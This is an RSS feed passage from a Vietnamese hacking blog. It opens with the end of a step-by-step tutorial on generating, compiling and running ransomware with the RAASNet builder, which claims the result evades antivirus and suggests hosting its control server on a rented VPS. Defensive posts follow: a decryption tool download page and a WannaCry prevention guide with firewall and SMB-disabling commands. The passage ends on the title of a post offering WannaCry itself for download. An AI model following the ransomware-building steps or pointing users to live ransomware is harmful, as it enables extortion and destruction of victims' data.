<li><span style="color: #0000ff;">EXIT:</span> thoát</li>
</ul>
<p>Bây giờ chúng ta vào <span style="color: #0000ff;">START SERVER:</span> nhập IP của máy chủ quản lý, trong trường hợp này là máy Kali linux của mình (mở terminal gõ lệnh <code>ifconfig</code> để xem IP),</p>
<p>Sau đó chọn tiếp <span style="color: #0000ff;">GENERATE PAYLOADS</span>, để thiếp lâp các hoạt động cho Ransomeware của bạn.</p>
<ul>
<li>Mode: chế độ hiển thị của virus</li>
<li>Remote Server: IP của Server (trong bài này là IP của Kali linux)</li>
<li>Encryption Type: chế độ mã hóa file, trong đó chế độ Ghost là an toàn nhất, chỉ đổi đuôi file chứ không mã hóa dữ liệu. Bạn khuyên các bạn nên dùng chế độ này để test.</li>
<li>Content: chỉnh sửa thêm thông báo, hình ảnh hiển thị khi nạn nhân kích hoạt virus.</li>
</ul>
<p>Sau khi thiết lập xong, bạn nhấn <span style="color: #0000ff;"><strong>Generate</strong> </span>để bắt đầu tạo Ransomware cho riêng bạn.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/12/mod-ransomware-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/12/mod-ransomware-1.jpg" alt="Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet 25" width="680" height="308" title="Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet 45"></a></p>
<p>Bây giờ trong thư mục <strong>RAASNet</strong> sẽ có 2 file là:</p>
<ul>
<li>payload.py: đây chính là con Ransomware bạn mới tạo ra</li>
<li>decryptor.py: đây là tool để giải mã dữ liệu khi virus đã mã hóa</li>
</ul>
<p>Nếu bạn muốn chuyển file<strong> .py sang .exe</strong> (bạn phải chạy RAASNet trên Windows) sau đó vào Menu <span style="color: #0000ff;">COMPILE PAYLOAD, </span>biên dịch xong, file sẽ nằm trong thư mục <strong>RAASNet/dish</strong></p>
<h3>Thực nghiệm trên Windows</h3>
<p>Bài viết này chỉ thực nghiệm, nên mình không biên dịch file payload.py sang exe mà chạy bằng python luôn cho đỡ tốn thời gian.</p>
<p>Trên Windows, cài Python 3.x.</p>
<p>Mở notepad tạo file <code>requirements.txt</code> với nội dung:</p>
<p><code>numpy==1.19.3</code><br />
<code>pymsgbox</code><br />
<code>pyaes</code><br />
<code>pycryptodome</code><br />
<code>pyinstaller</code><br />
<code>requests</code><br />
<code>python-geoip-python3</code><br />
<code>python-geoip-geolite2</code><br />
<code>pillow</code></p>
<p>Mở CMD gõ lệnh</p>
<p><code>pip install -r requirements.txt </code></p>
<p><em>Trong thực tế khi biên dịch py sang exe thì các thư viện này đã có sẵn, chúng ta sẽ không phải thực hiện các bước trên.</em></p>
<p>Bây giờ hãy thử copy con ransomware vừa tạo vào máy ảo Windows. dùng lệnh: <code>python payload.py</code> để kích hoạt, bùm, dữ liệu của bạn sẽ bị mã hóa sang đuôi <strong>DEMON</strong>.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/12/virus-ransomware-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/12/virus-ransomware-1.jpg" alt="Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet 26" width="860" height="446" title="Hướng dẫn tạo virus Ransomware tống tiền bằng RAASNet 46"></a></p>
<p>Nếu muốn giải mã, bạn copy file decryptor.py vào máy ảo Windows và gõ lệnh, <code>python decryptor.py</code>, dữ liệu sẽ được khôi phục lại như cũ</p>
<h2>Lưu ý</h2>
<p>Bài viết này chứng minh ransomware hiện nay khá nguy hiểm và không bị antivirus phát hiện. Ransomware được tạo ra hoạt động trên Windows, Linux và MacOS. Bạn nên biên dịch<strong> payload.py thành EXE</strong> để dễ demo trên WIndows.</p>
<p>Nếu muốn thử nghiệm Server môi trường Internet, bạn nên dùng VPN hoặc NAT Port . Hoặc tốt hơn nên thuê 1 VPS ở Azure hoặc AWS để thử nghiệm.</p>
<p>Cuối cùng xin nhắc lại, bài này để nghiên cứu học tập, không được áp dụng môi trường bên ngoài và với người khác. <span style="color: #ff0000;">Nếu không bạn sẽ chịu trách nhiệm trước pháp luật.</span></p>
<h2>Câu hỏi thường gặp</h2>
<h3>RAASNet có an toàn khi sử dụng cho mục đích nghiên cứu không?</h3>
<p>RAASNet chỉ nên được sử dụng trong môi trường được kiểm soát, ví dụ như máy ảo (VMware) với hệ điều hành Kali Linux hoặc Windows.  Tác giả không chịu trách nhiệm cho bất kỳ thiệt hại nào gây ra từ việc sử dụng công cụ này.</p>
<h3>Tôi có thể biên dịch payload.py thành file .exe được không?</h3>
<p>Có, bạn có thể biên dịch payload.py thành file .exe bằng chức năng &#8220;COMPILE PAYLOAD&#8221; trong RAASNet.  Tuy nhiên, điều này cần được thực hiện trên hệ điều hành Windows.</p>
<h3>Làm thế nào để giải mã dữ liệu sau khi sử dụng RAASNet?</h3>
<p>RAASNet cung cấp file decryptor.py để giải mã dữ liệu. Bạn cần chạy file này trong cùng môi trường mà bạn đã chạy payload.py.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/huong-dan-tao-ransomware-bang-raasnet/feed/</wfw:commentRss>
			<slash:comments>6</slash:comments>
		
		
			</item>
		<item>
		<title>360 Ransomware Decryption Tool 1.0.0.1271 &#8211; Giải mã file bị virus mã hóa</title>
		<link>https://anonyviet.com/download-360-ransomware-decryption-tool/</link>
					<comments>https://anonyviet.com/download-360-ransomware-decryption-tool/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 02 Jan 2020 11:10:12 +0000</pubDate>
				<category><![CDATA[Phần mềm máy tính]]></category>
		<category><![CDATA[360 Ransomware Decryption Tool]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[giải mã]]></category>
		<category><![CDATA[giải mã file]]></category>
		<category><![CDATA[mã hóa file]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[virus mã hóa]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=17211</guid>

					<description><![CDATA[360 Ransomware Decryption Tool có thể giúp giải mã các file đã bị mã hóa. Ngày nay các biến thể của Ransomware ngày càng nhiều. Nếu máy tính bị nhiễm loại virus này, toàn bộ dữ liệu sẽ bị mã hóa và đổi thành đuôi file khác. Bạn chỉ có cách trả tiền chuộc cho [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>360 Ransomware Decryption Tool có thể giúp giải mã các file đã bị mã hóa. Ngày nay các biến thể của <span style="color: #000000;"><a style="color: #000000;" href="https://anonyviet.com/?s=Ransomware">Ransomware</a> </span>ngày càng nhiều. Nếu máy tính bị nhiễm loại virus này, toàn bộ dữ liệu sẽ bị mã hóa và đổi thành đuôi file khác. Bạn chỉ có cách trả tiền chuộc cho Hacker để lấy Key giải mã. Công cụ này ra đời giúp bạn giải mã miễn phí hơn 80 loại ransomware bao gồm WannaCry và Petya.</strong></p>
<h2><strong>Các tính năng của 360 Ransomware Decryption Tool</strong></h2>
<h3><strong>Khôi phục dữ liệu bị mã hóa mà không phải trả tiền chuộc</strong></h3>
<p>Ứng dụng đặc biệt này hứa hẹn sẽ giải mã an toàn các file đã bị hacker chiếm giữ. Cho phép người dùng khôi phục dữ liệu mà không phải trả một nào.</p>
<p><strong>360 Ransomware Decryption Tool</strong> có thể giải mã các biến thể ransomware khác. Phần mềm có giao diện đơn giản và các điều khiển trực quan, cho phép người dùng duyệt đến thư mục lưu trữ các file được mã hóa. Vị trí lưu các file được giải mã có thể tùy chỉnh, nhưng đó là cài đặt duy nhất khả dụng. Tiếp theo, người ta phải nhấn nút Quét Quét ngay bây giờ để bắt đầu quá trình giải mã.</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2020/01/download-360-Ransomware-Decryption-Tool.png"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2020/01/download-360-Ransomware-Decryption-Tool.png" alt="download 360 Ransomware Decryption Tool" width="629" height="425" title="360 Ransomware Decryption Tool 1.0.0.1271 - Giải mã file bị virus mã hóa 48"></a></p>
<h3><strong>Chọn một thư mục cần giải mã và để ứng dụng làm phần còn lại</strong></h3>
<p>Khi ứng dụng thực hiện công việc của mình, người dùng có thể thấy file hiện đang được quét, số lượng file được mã hóa và giải mã và thời gian đã trôi qua. Điều người dùng phải ghi nhớ là mặc dù 360 Ransomware Decryption Tool hoạt động tốt nhất trong việc giải mã các file bị mã hóa, hoạt động có thể không thành công mọi lúc.</p>
<p>Công cụ này rất dễ sử dụng. Công cụ này có giao diện đơn giản để giải mã các file bị khóa bởi ransomware. Mặc dù nó có thể nó không thể giải mã tất cả các ransomware , nhưng bạn cũng nên thử trước khi cài đặt lại hệ điều hành và mất tất cả dữ liệu hoặc trả tiền chuộc theo yêu cầu của Hacker.</p>
<h2>Download 360 Ransomware Decryption Tool Lasted Version</h2>
<p>360 Ransomware Decryption Tool 1.0.0.1271 có thể được xem là vị cứu tinh của file bị mã hóa. Nếu bạn nhỡ dính Ransomware, thì hãy dùng tool này để giải mã thử. Biết đâu bạn sẽ may mắn lấy lại được dữ liệu mà không phải trả tiền chuộc.</p>
<p style="text-align: center;"><a href="https://www.majorgeeks.com/files/details/360_ransomware_decryption_tools.html" target="_blank" rel="noopener noreferrer"><span style="text-decoration: underline;"><strong><span style="font-size: 18pt;">Download</span></strong></span></a></p>
<ul>
<li>Tác giả: Qihu 360 Software Co</li>
<li>Ngày Update: 31/12/2019</li>
<li>Kích thước: 5.04 MB</li>
<li>License: Miễn phí</li>
<li>Yêu cầu: Win 10/8 / 7 / Vista</li>
</ul>
<h2>Câu hỏi thường gặp</h2>
<h3>Công cụ 360 Ransomware Decryption Tool có hỗ trợ giải mã tất cả các loại ransomware không?</h3>
<p>Không, công cụ này hỗ trợ giải mã hơn 80 loại ransomware, bao gồm WannaCry và Petya, nhưng không phải tất cả.  Tuy nhiên, vẫn nên thử sử dụng công cụ này trước khi xem xét các giải pháp khác.</p>
<h3>Tôi có cần trả phí để sử dụng 360 Ransomware Decryption Tool không?</h3>
<p>Không, công cụ này hoàn toàn miễn phí.</p>
<h3>Nếu công cụ không thể giải mã được file của tôi thì sao?</h3>
<p>Nếu công cụ không thể giải mã file của bạn, bạn có thể cần phải xem xét các giải pháp khác, như sao lưu dữ liệu hoặc liên hệ với chuyên gia an ninh mạng.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/download-360-ransomware-decryption-tool/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất</title>
		<link>https://anonyviet.com/huong-dan-cach-phong-tranh-ransomware-wannacry-chi-tiet-nhat/</link>
					<comments>https://anonyviet.com/huong-dan-cach-phong-tranh-ransomware-wannacry-chi-tiet-nhat/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 14 May 2017 15:52:40 +0000</pubDate>
				<category><![CDATA[Windows 7/8/10/11]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[RansomeFree]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[tống tiền]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[WannaCry]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=5346</guid>

					<description><![CDATA[Theo dòng sự kiện: Một nhóm Hacker tên là Shadow Broker đã hack vào hệ thống của NSA và kéo ra một mớ dữ liệu của một tổ chức do NSA quản lý gọi là Equation Group. Trong mớ dữ liệu này có chứa rất nhiều các exploit 0-days đuợc NSA sử dụng để tấn [&#8230;]]]></description>
										<content:encoded><![CDATA[<h2 style="text-align: justify;"><span style="color: #800080;"><strong>Theo dòng sự kiện:</strong></span></h2>
<p style="text-align: justify;">Một nhóm Hacker tên là Shadow Broker đã hack vào hệ thống của NSA và kéo ra một mớ dữ liệu của một tổ chức do NSA quản lý gọi là Equation Group. Trong mớ dữ liệu này có chứa rất nhiều các exploit 0-days đuợc NSA sử dụng để tấn công, do thám và đánh cắp dữ liệu của rất nhiều người dùng, tổ chức, chính phủ ở khắp nơi trên thế giới để phục vụ cho hoạt đ<span class="text_exposed_show">ộng tình báo.</span></p>
<p style="text-align: justify;"><a href="https://anonyviet.com/wp-content/uploads/2017/05/ransomware-wannacry.jpg"><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2017/05/ransomware-wannacry.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 39" width="530" height="298" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 65"></a></p>
<p style="text-align: justify;"><span class="text_exposed_show">Trong đó có một 0-days đặc biệt nguy hiểm mới được public đợt tháng 4 vừa rồi nhắm vào tất cả các phiên bản từ XP đến Windows 10. Lỗi này nhắm tới dịch vụ SMB (file sharing) của Windows cho phép attacker thực hiện remote execution, nói một cách nôm na, attacker có thể điều khiển máy tính từ xa, chẳng hạn như gọi lên một cmd với quyền SYSTEM, và thao tác ở đó mà người dùng không hề hay biết. </span></p>
<p style="text-align: justify;"><span class="text_exposed_show">WannaCry tận dụng exploit này,khi nó lây nhiễm vào được một máy, nó sethực hiện scan các máy khác trong cùng LAN, và thực hiện exploit. Một khi exploitdc rối,no đã có quyền kiểm soát và thao tác trên máy mới, nó sẽ tự động copy bản thân nó sang máy mới kiểm soát được và chạy -&gt; tiếp tục thực hiện đến với tất cả các máy còn lại.</span></p>
<p style="text-align: justify;"><span class="text_exposed_show">Điểm nguy hiểm nhất dẫn đến việc có thể bị tấn công từ ngoài LAN chính là việc các máy không bật Firewall, chặn port 445 của smb hoặc disable File sharing service. Attacker có thể tạo một hệ thống tự động scan theo dải ip public để tìm các máy mở port 445 đê thực hiện exploit.</span></p>
<p style="text-align: justify;"><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2017/05/wannacry-ransomware-decrypt-unlock-files.png" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 40" width="508" height="265" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 66"></p>
<p style="text-align: justify;"><span class="text_exposed_show">Hoặc attacker có thể dùng email phising đánh lừa người dùng bấm vào link, hoặc mở file đính kèm chứa một dropper, dropper này download code exploit về và chạy để tạo ra một backdoor, từ đó attacker ung dung tiến vào, hoặc đơn giản hơn nó down luôn WannaCry về và chạy.</span></p>
<p style="text-align: justify;"><span class="text_exposed_show">Điểm khác biệt khiến WannaCry nguy hiểm chính là việc nó dùng exploit để mở rộng phạm vi lây nhiễm, Và cũng cần nhấn mạnh là exploit này có thể tạo ra một backdoor với quyền SYSTEM ( tương đương với root trong Linux) nên nó có toàn quyền đối với hệ thống, từ việc disable AV, disable Firewall, sửa hoặc xoá file hệ thống, vô hiệu hoá hoàn toàn các cơ chế bảo vệ. </span></p>
<p style="text-align: justify;"><span class="text_exposed_show">Chỉ cần một node bị nhiễm là tất cả các máy trong cùng mạng nếu chưa được update sẽ dính theo. Lại càng nguy hiểm hơn ở VN khí người dùng xài Win lậu, không update, disable Firewall, và các bản win cũ như XP (MS đã ngừng support cho XP, tuy nhiên lần này vẫn phải tung một bản vá để sửa lỗi này cho XP)</span></p>
<h2 style="text-align: justify;"><strong><span style="color: #800080;">Xem trực tiếp các vụ tấn công mạng trên thế giới</span></strong></h2>
<p style="text-align: center;">[su_button url=&#8221;https://intel.malwaretech.com/pewpew.html&#8221; target=&#8221;blank&#8221; style=&#8221;bubbles&#8221; background=&#8221;#fbbc05&#8243; color=&#8221;#ea433&#8243; size=&#8221;10&#8243; center=&#8221;yes&#8221; radius=&#8221;round&#8221; icon=&#8221;icon: briefcase&#8221; icon_color=&#8221;#ea4335&#8243; text_shadow=&#8221;0px 0px 0px #81fb8c&#8221;] Live Analyst[/su_button]</p>
<p style="text-align: center;"><a href="https://anonyviet.com/wp-content/uploads/2017/05/map.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/map.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 41" width="1920" height="919" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 67"></a></p>
<h2 style="text-align: justify;"><strong><span style="color: #800080;">Hướng dẫn cách phòng tránh Ransomware WannaCry</span></strong></h2>
<h3 style="text-align: center;"><strong><span style="color: #008000;">Lưu ý:</span></strong></h3>
<p><span class="td_text_highlight_0" style="color: #ffff00;">Không tải, không mở bất kỳ tập tin nào không rõ nguồn gốc, đặc biệt là các file: exe, pdf</span></p>
<h3><span style="color: #008000;"><strong>Cách 1: Update Windows</strong></span></h3>
<p>Điều quan trọng nhất là bạn phải Update Windows để cập nhật bản vá mới nhất của Microsoft. Hãy làm ngay lập tức, đừng chần chờ gì nửa.</p>
<h3><span style="color: #008000;"><strong>Cách 2: Sử dụng công cụ RansomFree</strong></span></h3>
<p>Vừa mới đây hãng <a href="https://www.cybereason.com/cybereason-ransomfree-detects-and-stops-wannacry-ransomware/" target="_blank" rel="noopener noreferrer">Cybereason </a>vừa phát hành công cụ RansomeFree giúp bạn phát hiện và tiêu diệt ngay WannaCry khi vừa xuất hiện trên máy tính bạn.</p>
<p>Nếu lỡ máy tính bạn có đang dính Ransomware WannaCry, thì  RansomeFree cũng sẽ giúp bạn hạn chế bị lây lan qua các tập tin khác, tránh bị mã hóa toàn bộ dữ liệu</p>
<p><span style="color: #0000ff;"><strong>Xin lưu ý:</strong></span> tùy thuộc vào vị trí, một số tệp tin vẫn có thể bịmã hóa bởi ransomware WannaCry. Tuy nhiên, như được trình bày trong đoạn video này, phần lớn các tệp tin được bảo vệ, và ransomware không còn phát tán nữa.</p>
<p style="text-align: center;">[su_button url=&#8221;https://ransomfree.cybereason.com/download/&#8221; target=&#8221;blank&#8221; style=&#8221;bubbles&#8221; background=&#8221;#fbbc05&#8243; color=&#8221;#ea433&#8243; size=&#8221;10&#8243; center=&#8221;yes&#8221; radius=&#8221;round&#8221; icon=&#8221;icon: briefcase&#8221; icon_color=&#8221;#ea4335&#8243; text_shadow=&#8221;0px 0px 0px #81fb8c&#8221;]RansomFree[/su_button]</p>
<p style="text-align: justify;">Hoặc cài đặt và cập nhật các phần mềm AntiVirus mới nhất như: Kaspersky, Avast, Avira&#8230;</p>
<h3><span style="color: #008000;"><strong>Cách 3: Chặn Port </strong></span></h3>
<p><span style="color: #000000;"><a style="color: #000000;" href="https://anonyviet.com">Dùng Firewall</a> </span>có sẵn trên Windows, hoặc Firewall của các chương trình antivirus chặn các port sau:</p>
<ul>
<li>TCP ports 137, 139, and 445</li>
<li>UDP ports 137 and 138</li>
</ul>
<h4><strong><span style="color: #0000ff;">Dùng lệnh PowerShell</span></strong></h4>
<p>Vào Run: gõ lệnh Powershell rồi dán đoạn lệnh dưới đây</p>
<pre class="lang:default decode:true ">netsh advfirewall firewall add rule name="Disable SMB" dir=in action=block protocol=TCP localport=139
netsh advfirewall firewall add rule name="Disable SMB" dir=in action=block protocol=TCP localport=445
netsh advfirewall firewall add rule name="Disable SMB2" dir=in action=block protocol=udp localport=445
netsh advfirewall firewall add rule name="Disable RDC" dir=in action=block protocol=TCP localport=3389
netsh advfirewall firewall add rule name="Disable 137" dir=in action=block protocol=TCP localport=137
netsh advfirewall firewall add rule name="Disable 138" dir=in action=block protocol=TCP localport=138</pre>
<h4><strong><span style="color: #0000ff;">Dùng trên giao diện</span></strong></h4>
<p><strong>Cách dùng Firewall trên Windows:</strong></p>
<p>Vào <strong>Control Panel</strong> &#8211;&gt;<strong> Firewall</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2017/05/fw.png"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/fw.png" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 42" width="1543" height="595" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 68"></a>Chọn <strong>Advanced setting</strong></p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/fw2.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 43" width="1157" height="428" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 69"></p>
<p style="text-align: center;"><span style="color: #0000ff; font-size: 18pt;"><strong>Thực hiện lần lượt cho cả 2</strong></span></p>
<p style="text-align: center;"><a href="https://anonyviet.com/huong-dan-cach-phong-tranh-ransomware-wannacry-chi-tiet-nhat/"><strong>Inbound Rules</strong></a> và <a href="https://anonyviet.com/huong-dan-cach-phong-tranh-ransomware-wannacry-chi-tiet-nhat/"><strong>Outbound Rules</strong></a></p>
<p>Nhấn phải chuột vào <strong>Inbound Rules, chọn New Rule&#8230;</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2017/05/fw3.jpg"><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2017/05/fw3.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 44" width="271" height="261" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 70"></a></p>
<p>Check vào Ô <strong>Port</strong> rồi nhấn <strong>Next</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2017/05/fw4.jpg"><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2017/05/fw4.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 45" width="466" height="379" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 71"></a></p>
<p>Tiếp tục chọn vào <strong>TCP, trong phần Specific local ports: 137,139,445</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2017/05/fw5.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/fw5.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 46" width="892" height="726" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 72"></a></p>
<p>Chọn <strong>Block Connection</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2017/05/fw6-1.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/fw6-1.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 47" width="892" height="726" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 73"></a></p>
<p>Tiếp tục cứ nhấn Next,</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2017/05/fw7.jpg"><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/fw7.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 48" width="892" height="726" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 74"></a>Tới ô <strong>Name</strong> đặt gì cũng được.</p>
<p><img decoding="async" class="aligncenter size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/fw8.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 49" width="892" height="726" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 75"></p>
<p>Rồi tương tự thực hiện lại Bước 1, block port <strong><span style="color: #0000ff;">UDP</span></strong>: <strong>137,138</strong></p>
<p>Sau đó đến O<strong>utbound Rules</strong>, thực hiện như <strong>Inboud Rules</strong></p>
<h3><span style="color: #008000;"><strong>Cách 4: Tắt chế độ SMB</strong></span></h3>
<p>Bạn cần khởi động Power Shell lên, vào run gõ lệnh PowerShell</p>
<p><a href="https://anonyviet.com/wp-content/uploads/2017/05/pw.jpg"><img decoding="async" class="aligncenter " src="https://anonyviet.com/wp-content/uploads/2017/05/pw.jpg" alt="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 50" width="345" height="206" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 76"></a></p>
<h4><span style="color: #0000ff;"><strong>Máy tính cá nhân sử dụng Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, and Windows Server 2012</strong></span></h4>
<p>Copy lệnh dưới đây vào PowerShell</p>
<pre class="lang:default decode:true">sc.exe config lanmanworkstation depend= bowser/mrxsmb20/nsi
sc.exe config mrxsmb10 start= disabled
sc.exe config lanmanworkstation depend= bowser/mrxsmb10/nsi 
sc.exe config mrxsmb20 start= disabled
Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol</pre>
<p>Chỗ nào lỗi thì cứ bỏ qua, copy xong thì nhấn Enter nha</p>
<h4 class="sbody-h3"><span style="color: #0000ff;"><strong>Server sử dụng Windows 8 và Windows Server 2012</strong></span></h4>
<p>Copy lệnh dưới đây vào PowerShell</p>
<ul>
<li>Disable SMBv1</li>
</ul>
<pre class="lang:default decode:true">Set-SmbServerConfiguration -EnableSMB1Protocol $false</pre>
<ul>
<li>Disable SMBv2</li>
</ul>
<pre class="lang:default decode:true ">Set-SmbServerConfiguration -EnableSMB2Protocol $false</pre>
<p>&nbsp;</p>
<h4 class="sbody-h3"><span style="color: #0000ff;"><strong>Server sử dụng</strong></span><strong><span style="color: #0000ff;"> Windows 7, Windows Server 2008 R2, Windows Vista, and Windows Server 2008</span></strong></h4>
<p>Copy lệnh dưới đây vào PowerShell</p>
<ul class="sbody-free_list">
<li>Disable SMBv1
<div class="indent">
<pre class="lang:default decode:true">Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force</pre>
</div>
</li>
<li>Disable SMBv2</li>
</ul>
<div class="indent">
<pre class="lang:default decode:true ">Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB2 -Type DWORD -Value 0 -Force</pre>
<p>Bạn cần phải <strong>khởi động lại</strong> máy tính để hoàn tất nhé</p>
<h4></h4>
<h4 class="section-title ng-binding"><strong><span style="color: #0000ff;">Remove SMB v1 in Windows 8.1, Windows 10, Windows 2012 R2, and Windows Server 2016 bằng giao diện</span></strong></h4>
<p class="ng-scope"><span id="selectionBoundary_1488240249629_13045776454665625" class="rangySelectionBoundary"></span><strong>Windows Server:</strong> Vào Server Manager</p>
<div class="ng-scope">
<div class="imageAsset ng-scope"><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/4014204_en_1.png" alt="Server Manager - Dashboard method" width="726" height="544" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 77"></div>
<p>&nbsp;</p>
</div>
<p class="ng-scope"><strong>Windows Server:</strong> Sử dụng PowerShell</p>
<pre class="lang:default decode:true">Remove-WindowsFeature FS-SMB1</pre>
<div class="ng-scope">
<div class="imageAsset ng-scope"><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/4014205_en_1.png" alt="Server PowerShell method" width="405" height="142" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 78"></div>
<div class="imageAsset ng-scope"></div>
</div>
<p class="ng-scope"><strong>Máy tính cá nhân:</strong> Vào Control Panel chọn Add or Remove Programs</p>
<div class="ng-scope">
<div class="imageAsset ng-scope"><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/4014206_en_1.png" alt="Add-Remove Programs client method" width="387" height="342" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 79"></div>
</div>
<p class="ng-scope"><strong>Máy tính cá nhân:</strong></p>
<p class="ng-scope">Dùng PowerShell</p>
<pre class="lang:default decode:true ">Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol</pre>
<div class="ng-scope">
<div class="imageAsset ng-scope"><img decoding="async" class="alignnone size-full " src="https://anonyviet.com/wp-content/uploads/2017/05/4014207_en_1.png" alt="Windows Powershell as Administrator" width="586" height="174" title="Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 80"></div>
</div>
<div class="imageAsset ng-scope"></div>
<h2 class="imageAsset ng-scope"><span style="color: #008000;"><strong>Nếu lỡ bị nhiễm Ransomware WannaCry rồi thì sao?</strong> </span></h2>
<p>&#8211; Ngắt ngay đường mạng wifi internet và LAN nội bộ để không lây nhiễm các máy khác trong mạng</p>
<p>&#8211; Cài đặt ngay RansomFree (ở Cách 2) để tránh bị lây nhiễm</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/huong-dan-cach-phong-tranh-ransomware-wannacry-chi-tiet-nhat/feed/</wfw:commentRss>
			<slash:comments>7</slash:comments>
		
		
			</item>
		<item>
		<title>[Download] Ransomware WannaCry Virus tống tiền  mạnh nhất 2017</title>
		<link>https://anonyviet.com/download-ransomware-wannacry-virus-tong-tien-manh-nhat-2017/</link>
					<comments>https://anonyviet.com/download-ransomware-wannacry-virus-tong-tien-manh-nhat-2017/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 14 May 2017 04:24:51 +0000</pubDate>
				<category><![CDATA[Virus-Trojan-Rat]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[Ransomware WannaCry]]></category>
		<category><![CDATA[tống tiền]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[WannaCry]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=5343</guid>

